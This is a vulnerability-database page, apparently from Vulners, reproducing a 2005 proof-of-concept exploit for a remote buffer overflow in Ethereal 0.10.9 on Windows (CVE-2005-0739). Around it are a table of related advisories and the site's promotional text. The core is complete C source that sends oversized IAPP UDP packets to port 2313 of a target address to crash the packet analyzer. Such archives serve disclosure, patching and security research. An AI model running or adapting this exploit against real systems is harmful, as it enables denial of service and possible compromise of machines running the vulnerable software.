Ethereal 0.10.9 (Windows) - '3G-A11' Remote Buffer Overflow
| Reporter | Title | Published | Views | Family All 37 |
|---|---|---|---|---|
| CAN-2005-0739 | 23 Feb 202417:58 | – | cve | |
| CVE-2005-0739 | 13 Mar 200505:00 | – | cve | |
| ethereal -- multiple protocol dissectors vulnerabilities | 9 Mar 200500:00 | – | freebsd | |
| CVE-2005-0739 | 13 Mar 200505:00 | – | cvelist | |
| [SECURITY] [DSA 718-1] New ethereal packages fix buffer overflow | 28 Apr 200513:47 | – | debian | |
| [SECURITY] [DSA 718-1] New ethereal packages fix buffer overflow | 28 Apr 200513:47 | – | debian | |
| [SECURITY] [DSA 718-2] New ethereal packages fix buffer overflow | 28 Apr 200515:02 | – | debian | |
| [SECURITY] [DSA 718-2] New ethereal packages fix buffer overflow | 28 Apr 200515:02 | – | debian | |
| Debian DSA-718-2 : ethereal - buffer overflow | 29 Apr 200500:00 | – | nessus | |
| FreeBSD : ethereal -- multiple protocol dissectors vulnerabilities (cb470368-94d2-11d9-a9e0-0001020eed82) | 13 Jul 200500:00 | – | nessus |
10
/*
*
* Ethereal IAPP remote buffer overflow #2 PoC exploit
* ---------------------------------------------------
* To test this vulnerability on windows, try to send 3-10 packets
* that will trigger the crash, and scroll between captured packets
* in Ethereal.
*
* Coded by Leon Juranic <[email protected]>
* LSS Security <http://security.lss.hr/en/>
*
*/
#include <stdio.h>
#include <windows.h>
#pragma comment (lib,"ws2_32")
#define IAPP_PDU_SSID 0
typedef struct _e_iapphdr {
unsigned char ia_version;
unsigned char ia_type;
} e_iapphdr;
typedef struct _e_pduhdr {
unsigned char pdu_type;
unsigned char pdu_len_h;
unsigned char pdu_len_l;
} e_pduhdr;
void xp_sendpacket (char *pack)
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
int sock,i;
struct sockaddr_in sin;
unsigned char buf[2000];
char bla[2000];
e_iapphdr *iapp;
e_pduhdr *pdu;
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 ) {
printf ("error!!!\n");
ExitProcess(-1);
}
sock=socket(AF_INET,SOCK_DGRAM,0);
sin.sin_family=AF_INET;
sin.sin_addr.s_addr = inet_addr(pack);
sin.sin_port = htons(2313);
iapp = (e_iapphdr*)&buf;
iapp->ia_version = 1;
iapp->ia_type = 1;
pdu = (e_pduhdr*)(buf+2);
pdu->pdu_type = 3;
pdu->pdu_len_h = 0x05;
pdu->pdu_len_l = 0xa1;
memset (bla,'\xfc',1300);
strncpy ((char*)&buf+sizeof(e_iapphdr)+sizeof(e_pduhdr),bla,2000);
// for (i=0;i<1000;i++)
sendto (sock,(char*)buf,1489,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));
}
main (int argc, char **argv)
{
xp_sendpacket(argv[1]);
}
// milw0rm.com [2005-03-12]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Apr 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.07606